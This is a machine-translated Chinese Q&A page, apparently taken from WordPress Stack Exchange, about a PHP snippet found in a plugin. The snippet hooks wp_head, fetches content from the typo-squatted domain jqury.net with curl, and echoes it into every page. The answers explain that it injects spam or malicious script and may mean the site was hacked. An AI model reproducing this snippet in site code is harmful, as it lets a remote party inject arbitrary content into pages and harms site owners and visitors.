WordPress 我发现这是一个插件。它有什么作用？危险吗？

问题描述

我发现这是一个插件。它有什么作用？危险吗？

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1");
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);
        $jquery = curl_exec($ch);
        curl_close($ch);
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

最佳解决方案

它加载了一个包含垃圾邮件的标记块 (我想到发布一些源代码，但是我不想以任何方式发布内容) 来自一个域的拼写错误 – http://jquery.com/ – 由 jQuery 是一个有信誉和流行的 Javascript 库，WordPress 包含在 Core 中。我认为这个想法似乎是加载该库，实际上加载的东西非常不同。

而且在其他方​​面试图加载 jQuery 。注意变量名 $jquery 。

它也可能尝试加载恶意脚本。我没有检查我一定会把它称为危险的，特别是因为该页面上的内容可以随着域控制器的感觉而改变。

最好的是，这将会损害您的网站，因为搜索引擎不满意传播垃圾邮件的网站。

不要使用它对于您或网站上的任何其他人，除了运行该网站的人员，它没有任何益处。如果您在信誉良好的网站上发现这一点，请向他们报告。

次佳解决方案

是的，这是危险的代码，从垃圾邮件站点加载内容。

你没有为插件命名，但是如果你的网站上安装了这个代码，那么插件代码可能不是这样的，而是在安装之后被黑客入侵。如果是这种情况，您可能会发现网站上的恶意代码不仅仅是这个插件。

检查下载的插件代码，从原来的插件的任何地方，看看这个恶意代码是否在那里。如果没有，那么您的网站已被黑客入侵。如果您确定是这种情况，请阅读 this article from the Codex 。

参考文献

• I found this in a plugin. What does it do? is it dangerous?

注：本文内容整合自 Google/Baidu/Bing 辅助翻译的英文资料结果。如果您对结果不满意，可以加入我们改善翻译效果：薇晓朵技术论坛。